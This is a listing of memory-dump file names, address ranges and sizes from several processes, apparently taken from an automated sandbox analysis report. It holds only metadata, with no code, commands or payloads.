memory/1504-417-0x000000006E730000-0x000000006E8AD000-memory.dmpFilesize
1.5MB
-
memory/1648-861-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/1652-606-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/1652-770-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/1652-736-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/1652-851-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/1924-282-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/1924-94-0x0000000004A50000-0x0000000004E4C000-memory.dmpFilesize
4.0MB
-
memory/1924-95-0x00000000065F0000-0x0000000006EDB000-memory.dmpFilesize
8.9MB
-
memory/2072-26-0x00000131680F0000-0x0000013168112000-memory.dmpFilesize
136KB
-
memory/2072-29-0x0000013167F40000-0x0000013167F50000-memory.dmpFilesize
64KB
-
memory/2072-30-0x0000013167F40000-0x0000013167F50000-memory.dmpFilesize
64KB
-
memory/2072-28-0x0000013167F40000-0x0000013167F50000-memory.dmpFilesize
64KB
-
memory/2072-31-0x0000013167F40000-0x0000013167F50000-memory.dmpFilesize
64KB
-
memory/2072-27-0x00007FFF27450000-0x00007FFF27F12000-memory.dmpFilesize
10.8MB
-
memory/2072-35-0x0000013168160000-0x00000131682AF000-memory.dmpFilesize
1.3MB
-
memory/2072-36-0x00007FFF27450000-0x00007FFF27F12000-memory.dmpFilesize
10.8MB
-
memory/2380-37-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/2380-32-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/2380-93-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/2380-110-0x00000000055C0000-0x00000000055D0000-memory.dmpFilesize
64KB
-
memory/2380-38-0x00000000055C0000-0x00000000055D0000-memory.dmpFilesize
64KB
-
memory/2408-862-0x0000000010000000-0x0000000013BC3000-memory.dmpFilesize
59.8MB
-
memory/2416-63-0x0000000004500000-0x000000000456E000-memory.dmpFilesize
440KB
-
memory/2416-109-0x0000000004300000-0x0000000004400000-memory.dmpFilesize
1024KB
-
memory/2416-62-0x0000000004300000-0x0000000004400000-memory.dmpFilesize
1024KB
-
memory/2416-382-0x0000000000400000-0x0000000004067000-memory.dmpFilesize
60.4MB
-
memory/2416-267-0x0000000000400000-0x0000000004067000-memory.dmpFilesize
60.4MB
-
memory/2864-159-0x000000006F7D0000-0x000000006FB27000-memory.dmpFilesize
3.3MB
-
memory/2864-113-0x0000000004DE0000-0x0000000004DF0000-memory.dmpFilesize
64KB
-
memory/2864-157-0x000000007EFB0000-0x000000007EFC0000-memory.dmpFilesize
64KB
-
memory/2864-114-0x0000000004DE0000-0x0000000004DF0000-memory.dmpFilesize
64KB
-
memory/2864-112-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/2864-156-0x000000006FF40000-0x000000006FF8C000-memory.dmpFilesize
304KB
-
memory/2864-179-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/3064-579-0x000000006E730000-0x000000006E8AD000-memory.dmpFilesize
1.5MB
-
memory/3064-483-0x000000006E730000-0x000000006E8AD000-memory.dmpFilesize
1.5MB
-
memory/3064-487-0x00007FFF48340000-0x00007FFF48549000-memory.dmpFilesize
2.0MB
-
memory/3204-713-0x0000000000400000-0x00000000008AD000-memory.dmpFilesize
4.7MB
-
memory/3204-584-0x0000000000400000-0x00000000008AD000-memory.dmpFilesize
4.7MB
-
memory/3232-480-0x0000000010000000-0x0000000013BC3000-memory.dmpFilesize
59.8MB
-
memory/3352-402-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/3600-393-0x00007FFF48340000-0x00007FFF48549000-memory.dmpFilesize
2.0MB
-
memory/3600-398-0x000000006E730000-0x000000006E8AD000-memory.dmpFilesize
1.5MB
-
memory/3600-386-0x000000006E730000-0x000000006E8AD000-memory.dmpFilesize
1.5MB
-
memory/3600-346-0x0000000000400000-0x0000000000C2C000-memory.dmpFilesize
8.2MB
-
memory/3600-519-0x000000006E730000-0x000000006E8AD000-memory.dmpFilesize
1.5MB
-
memory/3828-136-0x00000000049D0000-0x0000000004DCA000-memory.dmpFilesize
4.0MB
-
memory/3828-76-0x0000000006570000-0x0000000006E5B000-memory.dmpFilesize
8.9MB
-
memory/3828-277-0x0000000000400000-0x0000000004426000-memory.dmpFilesize
64.1MB
-
memory/3828-75-0x00000000049D0000-0x0000000004DCA000-memory.dmpFilesize
4.0MB
-
memory/3856-484-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-481-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-485-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-486-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-488-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-499-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-498-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/3856-474-0x00007FF7B8990000-0x00007FF7B90D5000-memory.dmpFilesize
7.3MB
-
memory/4824-133-0x0000000005D60000-0x0000000005D87000-memory.dmpFilesize
156KB
-
memory/4824-132-0x00000000042A0000-0x00000000043A0000-memory.dmpFilesize
1024KB
-
memory/4824-153-0x0000000000400000-0x0000000004043000-memory.dmpFilesize
60.3MB
-
memory/4904-111-0x0000000005E10000-0x0000000005E2E000-memory.dmpFilesize
120KB
-
memory/4904-158-0x0000000007430000-0x0000000007441000-memory.dmpFilesize
68KB
-
memory/4904-96-0x0000000004F50000-0x0000000004F72000-memory.dmpFilesize
136KB
-
memory/4904-151-0x0000000007A10000-0x000000000808A000-memory.dmpFilesize
6.5MB
-
memory/4904-152-0x00000000073D0000-0x00000000073EA000-memory.dmpFilesize
104KB
-
memory/4904-154-0x0000000007410000-0x000000000741A000-memory.dmpFilesize
40KB
-
memory/4904-91-0x0000000002950000-0x0000000002960000-memory.dmpFilesize
64KB
-
memory/4904-92-0x0000000004FE0000-0x000000000560A000-memory.dmpFilesize
6.2MB
-
memory/4904-90-0x0000000002950000-0x0000000002960000-memory.dmpFilesize
64KB
-
memory/4904-89-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/4904-88-0x0000000002960000-0x0000000002996000-memory.dmpFilesize
216KB
-
memory/4904-106-0x0000000005920000-0x0000000005986000-memory.dmpFilesize
408KB
-
memory/4904-108-0x0000000005990000-0x0000000005CE7000-memory.dmpFilesize
3.3MB
-
memory/4904-155-0x0000000007520000-0x00000000075B6000-memory.dmpFilesize
600KB
-
memory/4904-137-0x000000006FF40000-0x000000006FF8C000-memory.dmpFilesize
304KB
-
memory/4904-97-0x0000000005840000-0x00000000058A6000-memory.dmpFilesize
408KB
-
memory/4904-168-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/4904-169-0x0000000007480000-0x000000000748E000-memory.dmpFilesize
56KB
-
memory/4904-139-0x000000006F7D0000-0x000000006FB27000-memory.dmpFilesize
3.3MB
-
memory/4904-149-0x0000000002950000-0x0000000002960000-memory.dmpFilesize
64KB
-
memory/4904-150-0x00000000072A0000-0x0000000007344000-memory.dmpFilesize
656KB
-
memory/4904-138-0x000000007F7F0000-0x000000007F800000-memory.dmpFilesize
64KB
-
memory/4904-115-0x0000000005ED0000-0x0000000005F1C000-memory.dmpFilesize
304KB
-
memory/4904-148-0x0000000007280000-0x000000000729E000-memory.dmpFilesize
120KB
-
memory/4904-134-0x0000000006D80000-0x0000000006DC6000-memory.dmpFilesize
280KB
-
memory/4904-135-0x0000000007220000-0x0000000007254000-memory.dmpFilesize
208KB
-
memory/4904-170-0x0000000007490000-0x00000000074A5000-memory.dmpFilesize
84KB
-
memory/4904-171-0x00000000074E0000-0x00000000074FA000-memory.dmpFilesize
104KB
-
memory/4904-172-0x0000000007500000-0x0000000007508000-memory.dmpFilesize
32KB
-
memory/4904-175-0x0000000074A40000-0x00000000751F1000-memory.dmpFilesize
7.7MB
-
memory/4968-760-0x000000006B810000-0x000000006CB27000-memory.dmpFilesize
19.1MB
